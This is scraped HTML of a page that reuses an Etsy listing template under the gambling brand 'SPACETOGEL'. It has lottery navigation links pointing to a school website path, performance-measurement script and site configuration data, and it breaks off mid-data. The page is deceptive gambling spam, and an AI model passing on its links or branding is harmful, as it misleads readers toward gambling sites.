    <span class="wt-icon wt-icon--smaller-xs wt-nudge-b-1 wt-nudge-r-3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M5.535 7A4 4 0 0 1 12 2.354 4 4 0 0 1 18.465 7H22v9h-1v6H3v-6H2V7zm9.466 0H13V5a2 2 0 1 1 2.001 2M11 5a2 2 0 1 0-2.001 2H11zm-.764 4c-.55.614-1.348 1-2.236 1v2a4.98 4.98 0 0 0 3-1v3H4V9zM13 11c.836.628 1.874 1 3 1v-2a3 3 0 0 1-2.236-1H20v5h-7zm-8 5v4h6v-4zm8 4v-4h6v4z"/></svg></span><span>
    SPACETOGEL
</span>
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    >
    BANDAR TOGEL
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/?ref=bandar-slot"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="2" >
    TOGEL 4D
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="3" >
    SPACETOGEL LOGIN
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    >
   SPACETOGEL
  </a>
</li>
                      
                </ul>
            </div>
        </div>
    </div>
</nav></div>



<div class="wt-overlay wt-z-index-4" aria-hidden="true" data-ui="overlay"></div>

<noscript>
    <div class="wt-body-max-width wt-pt-xs-2 wt-pl-xs-2 wt-pr-xs-2 wt-pl-md-4 wt-pr-md-4 wt-pt-md-3 wt-pb-xs-0">
        <div id="javascript-nag" class="wt-alert wt-alert--inline wt-alert--success-01 wt-mb-xs-2">
            <div> Manfaatkan sepenuhnya fitur situs kami dengan mengaktifkan JavaScript. </div>
        </div>
    </div>
</noscript>
<div class="sidebar-cart-carat"></div>
        <div data-below-header>
            
        </div>
        

        

            <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
    var webVitals=function(e){"use strict";var t,n,i,r,o,a=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},u=function(e){if("loading"===document.readyState)return"loading";var t=a();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},c=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},s=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var i=e,r=i.id?"#"+i.id:c(i)+(i.classList&&i.classList.value&&i.classList.value.trim()&&i.classList.value.trim().length?"."+i.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+r.length>(t||100)-1)return n||r;if(n=n?r+">"+n:r,i.id)break;e=i.parentNode}}catch(o){}return n},d=-1,f=function(e){addEventListener("pageshow",function(t){t.persisted&&(d=t.timeStamp,e(t))},!0)},l=function(){var e=a();return e&&e.activationStart||0},p=function(e,t){var n=a(),i="navigate";return d>=0?i="back-forward-cache":n&&(document.prerendering||l()>0?i="prerender":document.wasDiscarded?i="restore":n.type&&(i=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:i}},v=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var i=new PerformanceObserver(function(e){Promise.resolve().then(function(){t(e.getEntries())})});return i.observe(Object.assign({type:e,buffered:!0},n||{})),i}}catch(r){}},$=function(e,t,n,i){var r,o;return function(a){var u,c;t.value>=0&&(a||i)&&((o=t.value-(r||0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=(u=t.value,u>(c=n)[1]?"poor":u>c[0]?"needs-improvement":"good"),e(t))}},m=function(e){requestAnimationFrame(function(){return requestAnimationFrame(function(){return e()})})},g=function(e){var t=function(t){"pagehide"!==t.type&&"hidden"!==document.visibilityState||e(t)};addEventListener("visibilitychange",t,!0),addEventListener("pagehide",t,!0)},y=function(e){var t=!1;return function(n){t||(e(n),t=!0)}},h=-1,T=function(){return"hidden"!==document.visibilityState||document.prerendering?1/0:0},b=function(e){"hidden"===document.visibilityState&&h>-1&&(h="visibilitychange"===e.type?e.timeStamp:0,S())},_=function(){addEventListener("visibilitychange",b,!0),addEventListener("prerenderingchange",b,!0)},S=function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},E=function(e){document.prerendering?addEventListener("prerenderingchange",function(){return e()},!0):e()},w={passive:!0,capture:!0},C=new Date,L=function(e,r){t||(t=r,n=e,i=new Date,x(removeEventListener),I())},I=function(){if(n>=0&&n<i-C){var e={entryType:"first-input",name:t.type,target:t.target,cancelable:t.cancelable,startTime:t.timeStamp,processingStart:t.timeStamp+n};r.forEach(function(t){t(e)}),r=[]}},k=function(e){if(e.cancelable){var t,n,i,r,o,a=(e.timeStamp>1e12?new Date:performance.now())-e.timeStamp;"pointerdown"==e.type?(t=a,n=e,i=function(){L(t,n),o()},r=function(){o()},o=function(){removeEventListener("pointerup",i,w),removeEventListener("pointercancel",r,w)},addEventListener("pointerup",i,w),addEventListener("pointercancel",r,w)):L(a,e)}},x=function(e){["mousedown","keydown","touchstart","pointerdown"].forEach(function(t){return e(t,k,w)})},P=0,B=1/0,D=0,N=function(e){e.forEach(function(e){e.interactionId&&(B=Math.min(B,e.interactionId),P=(D=Math.max(D,e.interactionId))?(D-B)/7+1:0)})},R=function(){return o?P:performance.interactionCount||0},A=function(){"interactionCount"in performance||o||(o=v("event",N,{type:"event",buffered:!0,durationThreshold:0}))},F=[200,500],H=0,q=function(){return R()-H},M=[],U={},V=function(e){var t=M[M.length-1],n=U[e.interactionId];if(n||M.length<10||e.duration>t.latency){if(n)n.entries.push(e),n.latency=Math.max(n.latency,e.duration);else{var i={id:e.interactionId,latency:e.duration,entries:[e]};U[i.id]=i,M.push(i)}M.sort(function(e,t){return t.latency-e.latency}),M.splice(10).forEach(function(e){delete U[e.id]})}},j=function(e,t){t=t||{},E(function(){A();var n,i,r=p("INP"),o=function(e){e.forEach(function(e){e.interactionId&&V(e),"first-input"!==e.entryType||M.some(function(t){return t.entries.some(function(t){return e.duration===t.duration&&e.startTime===t.startTime})})||V(e)});var t,n=M[t=Math.min(M.length-1,Math.floor(q()/50))];n&&n.latency!==r.value&&(r.value=n.latency,r.entries=n.entries,i())},a=v("event",o,{durationThreshold:null!==(n=t.durationThreshold)&&void 0!==n?n:40});i=$(e,r,F,t.reportAllChanges),a&&("interactionId"in PerformanceEventTiming.prototype&&a.observe({type:"first-input",buffered:!0}),g(function(){o(a.takeRecords()),r.value<0&&q()>0&&(r.value=0,r.entries=[]),i(!0)}),f(function(){M=[],H=R(),r=p("INP"),i=$(e,r,F,t.reportAllChanges)}))})},z=[2500,4e3],G={};return e.onINP=function(e,t){j(function(t){(function(e){if(e.entries.length){var t=e.entries.sort(function(e,t){return t.duration-e.duration||t.processingEnd-t.processingStart-(e.processingEnd-e.processingStart)})[0];e.attribution={eventTarget:s(t.target),eventType:t.name,eventTime:t.startTime,eventEntry:t,loadState:u(t.startTime)}}else e.attribution={}})(t),e(t)},t)},e.onLCP=function(e,t){var n,i;n=function(t){(function(e){if(e.entries.length){var t=a();if(t){var n=t.activationStart||0,i=e.entries[e.entries.length-1],r=i.url&&performance.getEntriesByType("resource").filter(function(e){return e.name===i.url})[0],o=Math.max(0,t.responseStart-n),u=Math.max(o,r?(r.requestStart||r.startTime)-n:0),c=Math.max(u,r?r.responseEnd-n:0),d=Math.max(c,i?i.startTime-n:0),f={element:s(i.element),timeToFirstByte:o,resourceLoadDelay:u-o,resourceLoadTime:c-u,elementRenderDelay:d-c,navigationEntry:t,lcpEntry:i};return i.url&&(f.url=i.url),r&&(f.lcpResourceEntry=r),void(e.attribution=f)}}e.attribution={timeToFirstByte:0,resourceLoadDelay:0,resourceLoadTime:0,elementRenderDelay:e.value}})(t),e(t)},i=(i=t)||{},E(function(){var e,t=(h<0&&(h=T(),_(),f(function(){setTimeout(function(){h=T(),_()},0)})),{get firstHiddenTime(){return h}}),r=p("LCP"),o=function(n){var i=n[n.length-1];i&&i.startTime<t.firstHiddenTime&&(r.value=Math.max(i.startTime-l(),0),r.entries=[i],e())},a=v("largest-contentful-paint",o);if(a){e=$(n,r,z,i.reportAllChanges);var u=y(function(){G[r.id]||(o(a.takeRecords()),a.disconnect(),G[r.id]=!0,e(!0))});["keydown","click"].forEach(function(e){addEventListener(e,function(){return setTimeout(u,0)},!0)}),g(u),f(function(t){r=p("LCP"),e=$(n,r,z,i.reportAllChanges),m(function(){r.value=performance.now()-t.timeStamp,G[r.id]=!0,e(!0)})})}})},Object.defineProperty(e,"__esModule",{value:!0}),e}({});
</script>

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
        window.SPACETOGEL=window.SPACETOGEL||{};
        SPACETOGEL.Context=SPACETOGEL.Context||{};
        (function() {
            function assign(firstSource, secondSource) {
                if (!secondSource) return;
                var out = Object(firstSource);
                for (var key in secondSource) {
                    if (Object.prototype.hasOwnProperty.call(secondSource, key)) {
                        out[key] = secondSource[key];
                    }
                }
                return out;
            }
            SPACETOGEL.Context.feature=assign(SPACETOGEL.Context.feature ? SPACETOGEL.Context.feature : {}, {"profile_dropdown_to_help_center":false,"sitewide_si_mweb_gated_favoriting":false,"isAppShellEnabled":true,"core_fulfillment.product_level_readiness_states":false,"design_systems.buybox_performance_web_components":false,"seller_platform_web.buyer_inquiry":false,"seller_platform_web.seller_local_time":false,"seller_platform_web.item_detail_overlay":false,"buyer_promise.issue_resolution.fee_avoidance_v2":false,"content_moderation.convo_safety.structured_convos":false,"risk_experience.buyer_email_verification":false});
            SPACETOGEL.Context.data=assign(SPACETOGEL.Context.data ? SPACETOGEL.Context.data : {}, {"is_mobile":false,"should_auto_redirect":false,"locale_settings":{"language":{"code":"en-US","id":0,"name":"English (US)","translation":"English (US)","is_detected":false,"is_default":true},"currency":{"currency_id":360,"code":"IDR","name":"Indonesian Rupiah","number_precision":0,"symbol":"Rp","listing_enabled":true,"browsing_enabled":true,"buyer_location_restricted":false,"rate_updates_enabled":true,"is_synthetic":true,"is_detected":false,"is_default":false,"append_currency_symbol":false},"region":{"code":"ID","country_id":121,"name":"Indonesia","translation":"Indonesia","is_detected":false,"is_default":false,"is_EU_region":false},"subdir_code":""},"neu_api_specs_sample_rate":null,"FB_GRAPHQL_VERSION":"v2.10","page_guid":"ffbde3696ef.69632e5014d83cdc8fa2.00","primary_event_name":"view_listing","request_uuid":"EunhLnzL4sAYJypZdeOPahA2o_53","user_is_test_account":false,"user_id":null,"css_variant":"sasquatch","runtime_analysis":false,"collage_shadow_dom_css_url":"https:\/\/www.etsy.com\/ac\/sasquatch\/css\/collage\/shadow.b60eba69b0e074.css","fix_domready":true,"auto_yield":true,"vite_public_path":"https:\/\/www.etsy.com\/ac\/alphaVite\/js\/en-US\/","guest_uaid":["uj0nemGYfZm0u5UhoRQWjT5qMRzf","uj0nemGYfZm0u5UhoRQWjT5qMRzf"],"is_app_shell":true,"csrf_nonce":"3:1757443933:Mvi3gD28lGl_sMVoWBqRUvO_fPN7:fb5b3b0b6c9d621df07685fcadfae794290315e934e51dac8c5cc31a46f635c0","uaid_nonce":"3:1757443933:y6IRaUq1O7KIFfqDjKuVNvcfAysZ:e9f728fdc47b6a20961f8aef4d6743cf20348efc7ecb9616fd788cfe816da6a4","clientlogger":{"is_enabled":true,"endpoint":"\/clientlog","logs_per_page":6,"id":"EunhLnzL4sAYJypZdeOPahA2o_53","digest":"e45a20331c4c369cb55b4c17b23900bdd1979e0f","enabled_features":["info","warn","error","basic","uncaught"]},"01125905a4e5ddf2_appshell_fallback":"recs-impression","3c65557fa67e42dc_appshell_fallback":"bf47527aa0b4cf042","c5420ec98ed7db34_appshell_fallback":"b58bc9bdcc28e8c2a","imp_listener_sources":["ads","search","recs","nonlisting"],"impact_tracker_should_prompt_signin":false,"impact_tracker_should_direct_open":false,"shop_favorites_see_all_link":"See all","shop_favorites_search_header":"Shops you follow","is_mobile_shop_search":false,"show_simplified_mobile_header":false,"is_eligible_for_ship_to_setting_in_global_header":false,"remove_catnav_for_bots":false,"in_cart_count":0,"page_type":"view_listing","is_desktop_mini_favorites_operational_enabled":false,"clickable_nav":true,"has_dropdown":true,"add_vintage_node":false,"images_in_l2":false,"recs":[],"mweb_full_screen_search_dropdown":false,"relocate_cat_nav":false,"zero_pane_recent_searches":[],"is_eligible_to_fetch_category_suggestions":false,"category_suggestions_in_autosuggest_variant":null,"is_eligible_for_contentful_title_on_trending_searches":true,"is_eligible_for_always_show_shop_search":true,"is_eligible_for_search_bar_improvements":false,"is_eligible_for_refinement_pills_in_autosuggest":true,"mott_version":"761dfd2","catnav_show_sales":false,"catnav_gift_guide":"off","gifting_catnav_flyout_js":false,"should_show_registry_on_nav":false,"should_use_gifting_taxos_in_nav_flyout":false,"impact_message":{"footer_renewable_impact":{"impact_name":"footer_renewable_impact","impact_themes":["sustainability"],"impact_audiences":["buyers"]},"lp_impact_narrative_banner_carbon":{"impact_name":"lp_impact_narrative_banner_carbon","impact_themes":["carbon"],"impact_audiences":["buyers"]}},"airgap_url":"https:\/\/transcend-cdn.com\/cm\/ac71e058-41b7-4026-b482-3d9b8e31a6d0\/airgap.js","airgap_bundle":"control_bundle","dual_write_enabled":true,"google_tag_manager_async_enabled":false,"dynamic_privacy_settings_ui_enabled":false,"forced_data_regimes":"","has_forced_data_regimes":false,"all_purposes":["Advertising","Functional"],"all_regimes":["us-gpc","consent-prompt"],"default_consent_expiry":518400,"disable_advertising_regimes":[],"seller_is_viewing_own_listing":false,"listingId":4302118744,"listing_price":22.5,"shopId":25947065,"shop_id":25947065,"shop_name":"SPACETOGEL","custom_orders_listings2":true,"is_listing_preview":false,"checkout_decorator":"","was_landing_from_external_referrer":false,"should_collapse_neighbors":false,"should_open_single_content_toggle":false,"is_logged_in":false,"referring_listing_id":4302118744,"address_formats":{"0":{"postal_code_type":"postal","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"ZZ"},"55":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AF"},"306":{"postal_code_type":"postal","postal_code_pattern":"22\\d{3}","postal_code_placeholder":"","country_iso_code":"AX"},"57":{"postal_code_type":"Postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AL"},"95":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"DZ"},"250":{"postal_code_type":"zip","postal_code_pattern":"(96799)(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"AS"},"228":{"postal_code_type":"postal","postal_code_pattern":"AD[1-7]0\\d","postal_code_placeholder":"","country_iso_code":"AD"},"251":{"postal_code_type":"postal","postal_code_pattern":"(?:AI-)?2640","postal_code_placeholder":"","country_iso_code":"AI"},"59":{"postal_code_type":"postal","postal_code_pattern":"((?:[A-HJ-NP-Z])?\\d{4})([A-Z]{3})?","postal_code_placeholder":"","country_iso_code":"AR"},"60":{"postal_code_type":"postal","postal_code_pattern":"(?:37)?\\d{4}","postal_code_placeholder":"","country_iso_code":"AM"},"61":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"3393","country_iso_code":"AU"},"62":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AT"},"63":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AZ"},"232":{"postal_code_type":"postal","postal_code_pattern":"(?:^|\\b)(?:1[0-2]|[1-9])\\d{2}(?:$|\\b)","postal_code_placeholder":"","country_iso_code":"BH"},"68":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BD"},"237":{"postal_code_type":"Postal","postal_code_pattern":"BB\\d{5}","postal_code_placeholder":"","country_iso_code":"BB"},"71":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"BY"},"65":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BE"},"225":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?[A-Z0-9]{2}","postal_code_placeholder":"","country_iso_code":"BM"},"76":{"postal_code_type":"Postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"BT"},"70":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"BA"},"74":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}-?\\d{3}","postal_code_placeholder":"","country_iso_code":"BR"},"255":{"postal_code_type":"postal","postal_code_pattern":"BBND 1ZZ","postal_code_placeholder":"","country_iso_code":"IO"},"231":{"postal_code_type":"postal","postal_code_pattern":"VG\\d{4}","postal_code_placeholder":"","country_iso_code":"VG"},"75":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?\\d{4}","postal_code_placeholder":"","country_iso_code":"BN"},"69":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BG"},"135":{"postal_code_type":"postal","postal_code_pattern":"\\d{5,6}","postal_code_placeholder":"","country_iso_code":"KH"},"79":{"postal_code_type":"postal","postal_code_pattern":"[ABCEGHJKLMNPRSTVXY]\\d[ABCEGHJ-NPRSTV-Z] ?\\d[ABCEGHJ-NPRSTV-Z]\\d","postal_code_placeholder":"A1A 1A1","country_iso_code":"CA"},"222":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CV"},"247":{"postal_code_type":"postal","postal_code_pattern":"KY\\d-\\d{4}","postal_code_placeholder":"","country_iso_code":"KY"},"81":{"postal_code_type":"postal","postal_code_pattern":"\\d{7}","postal_code_placeholder":"","country_iso_code":"CL"},"82":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"CN"},"257":{"postal_code_type":"postal","postal_code_pattern":"6798","postal_code_placeholder":"","country_iso_code":"CX"},"258":{"postal_code_type":"postal","postal_code_pattern":"6799","postal_code_placeholder":"","country_iso_code":"CC"},"86":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"CO"},"87":{"postal_code_type":"postal","postal_code_pattern":"\\d{4,5}|\\d{3}-\\d{4}","postal_code_placeholder":"","country_iso_code":"CR"},"118":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"HR"},"88":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"CU"},"89":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CY"},"90":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"","country_iso_code":"CZ"},"93":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"DK"},"94":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"DO"},"96":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"EC"},"97":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EG"},"187":{"postal_code_type":"postal","postal_code_pattern":"CP [1-3][1-7][0-2]\\d","postal_code_placeholder":"CP 1101","country_iso_code":"SV"},"100":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EE"},"101":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"ET"},"262":{"postal_code_type":"postal","postal_code_pattern":"FIQQ 1ZZ","postal_code_placeholder":"","country_iso_code":"FK"},"241":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"FO"},"102":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"FI"},"103":{"postal_code_type":"postal","postal_code_pattern":"\\d{2} ?\\d{3}","postal_code_placeholder":"75000","country_iso_code":"FR"},"115":{"postal_code_type":"postal","postal_code_pattern":"9[78]3\\d{2}","postal_code_placeholder":"","country_iso_code":"GF"},"263":{"postal_code_type":"postal","postal_code_pattern":"987\\d{2}","postal_code_placeholder":"","country_iso_code":"PF"},"106":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"GE"},"91":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"80331","country_iso_code":"DE"},"226":{"postal_code_type":"postal","postal_code_pattern":"GX11 1AA","postal_code_placeholder":"","country_iso_code":"GI"},"112":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"104 31","country_iso_code":"GR"},"113":{"postal_code_type":"postal","postal_code_pattern":"39\\d{2}","postal_code_placeholder":"","country_iso_code":"GL"},"265":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"GP"},"266":{"postal_code_type":"zip","postal_code_pattern":"(969(?:[12]\\d|3[12]))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"GU"},"114":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"GT"},"305":{"postal_code_type":"postal","postal_code_pattern":"GY\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"GG"},"108":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"GN"},"110":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"GW"},"119":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HT"},"267":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HM"},"268":{"postal_code_type":"postal","postal_code_pattern":"00120","postal_code_placeholder":"","country_iso_code":"VA"},"117":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"HN"},"120":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HU"},"126":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"IS"},"122":{"postal_code_type":"pin","postal_code_pattern":"^[1-9][0-9]{5}$","postal_code_placeholder":"110001","country_iso_code":"IN"},"121":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"ID"},"124":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}-?\\d{5}","postal_code_placeholder":"","country_iso_code":"IR"},"125":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"IQ"},"123":{"postal_code_type":"eircode","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"IE"},"269":{"postal_code_type":"postal","postal_code_pattern":"IM\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"IM"},"127":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}(?:\\d{2})?","postal_code_placeholder":"","country_iso_code":"IL"},"128":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"50100","country_iso_code":"IT"},"131":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}-?\\d{4}","postal_code_placeholder":"100-0001","country_iso_code":"JP"},"307":{"postal_code_type":"postal","postal_code_pattern":"JE\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"JE"},"130":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"JO"},"132":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"KZ"},"133":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KE"},"137":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KW"},"134":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"KG"},"138":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LA"},"146":{"postal_code_type":"postal","postal_code_pattern":"LV-\\d{4}","postal_code_placeholder":"","country_iso_code":"LV"},"139":{"postal_code_type":"postal","postal_code_pattern":"(?:\\d{4})(?: ?(?:\\d{4}))?","postal_code_placeholder":"","country_iso_code":"LB"},"143":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"LS"},"140":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"LR"},"272":{"postal_code_type":"postal","postal_code_pattern":"948[5-9]|949[0-8]","postal_code_placeholder":"","country_iso_code":"LI"},"144":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LT"},"145":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"LU"},"151":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MK"},"149":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"MG"},"159":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MY"},"238":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MV"},"227":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{3} ?\\d{2,4}","postal_code_placeholder":"","country_iso_code":"MT"},"274":{"postal_code_type":"zip","postal_code_pattern":"(969[67]\\d)(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"MH"},"275":{"postal_code_type":"postal","postal_code_pattern":"9[78]2\\d{2}","postal_code_placeholder":"","country_iso_code":"MQ"},"239":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}(?:\\d{2}|[A-Z]{2}\\d{3})","postal_code_placeholder":"","country_iso_code":"MU"},"276":{"postal_code_type":"postal","postal_code_pattern":"976\\d{2}","postal_code_placeholder":"","country_iso_code":"YT"},"150":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MX"},"277":{"postal_code_type":"zip","postal_code_pattern":"(9694[1-4])(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"FM"},"148":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MD"},"278":{"postal_code_type":"postal","postal_code_pattern":"980\\d{2}","postal_code_placeholder":"","country_iso_code":"MC"},"154":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MN"},"155":{"postal_code_type":"postal","postal_code_pattern":"8\\d{4}","postal_code_placeholder":"","country_iso_code":"ME"},"147":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MA"},"156":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MZ"},"153":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MM"},"160":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NA"},"166":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NP"},"233":{"postal_code_type":"postal","postal_code_pattern":"988\\d{2}","postal_code_placeholder":"","country_iso_code":"NC"},"167":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"3974","country_iso_code":"NZ"},"163":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"NI"},"161":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"NE"},"162":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"NG"},"282":{"postal_code_type":"postal","postal_code_pattern":"2899","postal_code_placeholder":"","country_iso_code":"NF"},"283":{"postal_code_type":"zip","postal_code_pattern":"(9695[012])(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"MP"},"176":{"postal_code_type":"postal","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"KP"},"165":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"NO"},"168":{"postal_code_type":"postal","postal_code_pattern":"(?:PC 